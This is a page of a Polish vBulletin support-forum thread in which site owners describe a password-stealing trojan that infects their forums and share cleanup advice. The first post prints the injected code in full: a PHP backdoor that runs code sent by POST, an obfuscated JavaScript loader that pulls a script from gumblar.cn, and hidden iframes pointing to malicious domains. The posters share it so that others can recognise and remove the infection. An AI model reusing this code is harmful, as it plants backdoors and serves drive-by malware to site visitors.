• Rejestracja
vBHELP.pl - polskie wsparcie vBulletin
Strona 1 z 2 12 OstatniOstatni
  1. #1
    Awatar Davred
    Davred jest nieaktywny Stały bywalec
    Dołączył
    maj 2008
    Posty
    168
    Przydatne posty
    1

    Domyślnie Trojan mieszający w vB

    Postanowiłęm opisać sprawę , wczoraj złapałem trojana, który przechwytuje z total commandera, i prawdopodobnie z fileziili hasła, po czym pakuje sie na ftp wszystkich kont które znalazł.

    podczas wchodzenia na stronę strona się zamula łąduje się do 83-95% i stoi, a w tym moemncie próbuje się załadowac trojanek do naszego pc, jeżeli ktoś ma pożadnego antywira to on go zblokuje co w ekecie da wizaca stronę na tych 85% jeżeli trojanik się załaduje bo np do ochrony uzywamy pandy ;] bo zwierzaki wiedzą tyle o wirusach to pozaładawoaniu trojana strona nam się w mig ładuje do konca ;]

    otóz ten kochany trojanek miesza róznież w plikach, jego wczesniejsza wersja motała tylko index.php i index.html, ale nowy heeee, 12 godzin przed kompem żeby go namierzyć wiec opisze co i jak na przykładzie vb, bo tam tem mi wlazł ;] jak ktoś złapie to samo to bez paniki da się wyczyściic ;]

    wiec, trojan miesza w plikach w plikach które maja w nazwie:

    index, admin, functions, mod, page, config, md5, oraz wszysckich o roższezeniu "js" , od vbseo w includes wszystkie łapie równiez

    w pisy w indexach wyglądaja tak że na górze dodaje:

    Kod:
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBMZ0o9JyUnO3ZhciBQUVhmeT0oJ3ZhcjwyMGE8M2Q8MjJTPDYzcmlwdEU8NmVnPDY5bjw2NTwyMjwyY2I8M2Q8MjJWZXJzaW9uPDI4KTwyYjwyMjwyY2o8M2Q8MjI8MjI8MmN1PDNkPDZlPDYxPDc2aWdhdG88NzI8MmV1c2VyQWc8NjU8NmV0PDNiaWYoKHU8MmVpbmRleE88NjYoPDIyVzw2OW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGU8NzhPPDY2KDwyMk5UPDIwPDM2PDIyPDI5PDNjMCk8MjY8MjYoZG88NjN1PDZkZW48NzQ8MmVjb29raWU8MmU8NjluZGV4T2YoPDIybWllazwzZDE8MjIpPDNjPDMwKTwyNjwyNih0PDc5cDw2NW9mKHpydnp0PDczPDI5PDIxPDNkPDc0eXBlb2YoPDIyQTwyMikpKTw3Ynpydnp0czwzZDwyMjw0MTwyMjwzYjw2NTw3NmFsKDwyMjw2OWYodzw2OTw2ZWQ8NmY8Nzc8MmU8MjIrPDYxKzwyMilqPDNkais8MjI8MmJhKzwyMk1hPDZhPDZmPDcyPDIyK2I8MmJhKzwyMk1pbjw2ZnI8MjIrYithKzwyMjw0Mjw3NWlsZDwyMis8NjIrPDIyajwzYjwyMjwyOTwzYjw2NDw2ZmN1bWVudDwyZXdyaXRlPDI4PDIyPDNjc2NyaXB0PDIwc3I8NjM8M2Q8MmY8MmY8Njd1bWJsPDYxPDcyPDJlPDYzbjwyZnJzczwyZjwzZmk8NjQ8M2Q8MjIrPDZhKzwyMjwzZTwzYzw1YzwyZjw3M2M8NzI8NjlwdDwzZTwyMik8M2I8N2QnKS5yZXBsYWNlKC88L2csTGdKKTtldmFsKHVuZXNjYXBlKFBRWGZ5KSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    a na koniec :

    Kod:
    <center><a style="color:white;" href="http://hoxxybydesign.com/">hoxxybydesign.com</a><br />
    <a style="color:white;" href="vbteam.info">vbteam.info</a><br /></center>
    <iframe src="http://quoasty.com/?click=7CCF9B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=31085375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    <iframe src="http://greatliteautobest.cn/ts/in.cgi?mozila15" width=2 height=4 style="visibility: hidden"></iframe>
    na końcu czasem jest inny od 1 do 3 iframów ;]


    co do plików js to łądnie nam lokuje na samym dole taki kodzik:

    Kod:
    <!-- 
    (function(){var LgJ='%';var PQXfy=('var<20a<3d<22S<63riptE<6eg<69n<65<22<2cb<3d<22Version<28)<2b<22<2cj<3d<22<22<2cu<3d<6e<61<76igato<72<2euserAg<65<6et<3bif((u<2eindexO<66(<22W<69n<22)<3e0)<26<26(u<2einde<78O<66(<22NT<20<36<22<29<3c0)<26<26(do<63u<6den<74<2ecookie<2e<69ndexOf(<22miek<3d1<22)<3c<30)<26<26(t<79p<65of(zrvzt<73<29<21<3d<74ypeof(<22A<22)))<7bzrvzts<3d<22<41<22<3b<65<76al(<22<69f(w<69<6ed<6f<77<2e<22+<61+<22)j<3dj+<22<2ba+<22Ma<6a<6f<72<22+b<2ba+<22Min<6fr<22+b+a+<22<42<75ild<22+<62+<22j<3b<22<29<3b<64<6fcument<2ewrite<28<22<3cscript<20sr<63<3d<2f<2f<67umbl<61<72<2e<63n<2frss<2f<3fi<64<3d<22+<6a+<22<3e<3c<5c<2f<73c<72<69pt<3e<22)<3b<7d').replace(/</g,LgJ);eval(unescape(PQXfy))})();
     -->

    to tyle, generalnie pakuje wszedzie gdzie się da, wszystkie puste index.html w kazdym folderku od stylu z grafami np. juz nie jest pusty etc, no przejrzec trzeba wszystko to co podałem wyżej ;]


    tak więc jak ktoś złapie syfa - nie panikuj !!!! ;]
    Ostatnio edytowane przez Davred ; 06.05.2009 o 17:13



  2. #2
    Awatar araj
    araj jest nieaktywny Advanced Member
    Dołączył
    sty 2008
    Przegląda
    Dania
    Posty
    431
    Przydatne posty
    2

    Domyślnie

    rada - nie przechowywać hasła w commanderze


  3. #3
    Awatar Davred
    Davred jest nieaktywny Stały bywalec
    Dołączył
    maj 2008
    Posty
    168
    Przydatne posty
    1

    Domyślnie

    jkaby ktoś szukał info o tym trojanie to tu jest troche:

    Kod:
    http://cs-puchatek.pl/topics189/wirusy-na-forum-problem-dotykajacy-wiele-for-vt22181.htm


  4. #4
    Ds-Box jest nieaktywny Użytkownik
    Dołączył
    maj 2008
    Posty
    56
    Przydatne posty
    1

    Domyślnie

    No umnie tez z tym jazda na maxa :mad:Ledwo postawiłem wszystko na nogi i nie minelo dwa dni i masz , dzis trojany jak sie patrzy avast głównie sie pluje ,nie mam sily juz tego naprawiac.Zastanawiam sie czy da sie to reklamowac w Jelsoft Enterprises Ltd.
    Ostatnio edytowane przez Ds-Box ; 07.05.2009 o 00:10


  5. #5
    Awatar bartol
    bartol jest nieaktywny Advanced Member
    Dołączył
    maj 2008
    Posty
    599
    Przydatne posty
    2

    Domyślnie

    Nie zapomnijcie zmienić danych do ftp.
    Potrzebujesz pomocy przy instalacji i konfiguracji forum? Zgłoś się do mnie.

    Instalacje, aktualizacje, konwersje, naprawy, pomoc
    >>KLIKNIJ<< aby dowiedzieć się więcej.


  6. #6
    Awatar pitu
    pitu jest nieaktywny Advanced Member
    Dołączył
    mar 2008
    Posty
    723
    Przydatne posty
    3

    Domyślnie

    Cytat Zamieszczone przez Ds-Box Zobacz posta
    Zastanawiam sie czy da sie to reklamowac w Jelsoft Enterprises Ltd.
    A co ma do tego Jelsoft? To nie ich wina, że tak się zabezpieczyłeś.
    Masz problem? Pisz na forum, a nie na PW, GG! Na GG oraz PW przyjmuje jedynie indywidualne zlecenia.
    _____________________________________

    Zajmuję się:
    -instalacją vBulletin
    -przenoszeniem na inny serwer
    -aktualizacją do nowszej wersji forum oraz modyfikacji
    -instalacją aktualizacji/styli
    -wszelkiego rodzaju pracami związanymi ze skryptem vBulletin

    Więcej szczegółów na PW - Klik


  7. #7
    tempo jest nieaktywny Stały bywalec
    Dołączył
    cze 2008
    Posty
    167

    Domyślnie

    U mnie też szlag trafił panel admina w jednym z 2 moich for. Wyświetla się biała stona, tak jak to Davred zapodał w kodzie trojana.


  8. #8
    Awatar Davred
    Davred jest nieaktywny Stały bywalec
    Dołączył
    maj 2008
    Posty
    168
    Przydatne posty
    1

    Domyślnie

    trojek się aktywuje o 20, pewnie gdzieś ma w rejestrze wywołanie czasowe, ale plik łąduje się do tempa u mnie był usunęłem go i cisza, teraz ok, ból taki ze antywir nie wyjkrywał go, łapał tylko te nowe sciagane przy wchodzeniu na strone juz zainfekowana, wiec radzę poszperać u siebie, bo jak masz syfa na hdd do będziesz się w kółko bawić z nim . ;]

    no to wyczysciłem moje fora, po zrobieniu moich 6 for to mozna powiedziec ze już specem od czyszczenia po tym trojanie ejstem ;] jakby co to piszcie to pomoge ;] bo wiem o tym trojanie i jego działąniach w vb all ;]

    edit-------

    sory Max, niech ktoś scali te moje 2 tematy bo kliknęło się ;]


  9. #9
    Awatar day-dreamer
    day-dreamer jest nieaktywny Użytkownik vBHELP.pl
    Dołączył
    lut 2008
    Posty
    723
    Przydatne posty
    3

    Domyślnie

    Moje forum dziś tez opętał ten virus :mad: programu total comander nie używam w cale hasel tez nie zapamiętuje program antywirusowy kasperski naradzie się pozbyłem tego virusa ale ciekawe co dalej będzie.

    jakie polecacie programy ja używam FileZilla


    i jeszcze taki szajs mi wyskakuje gdzie to może być?

    Ostatnio edytowane przez day-dreamer ; 10.05.2009 o 16:45


  10. #10
    tempo jest nieaktywny Stały bywalec
    Dołączył
    cze 2008
    Posty
    167

    Domyślnie

    Davred pisał że prawdopodobnie z Filezilli tez łapie, więc masz. Ja dalej czyszcze, ominąłem wczesniej indeksy html, a tam tez siedzi dziadostwo.


Strona 1 z 2 12 OstatniOstatni
Chmurka.pl

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67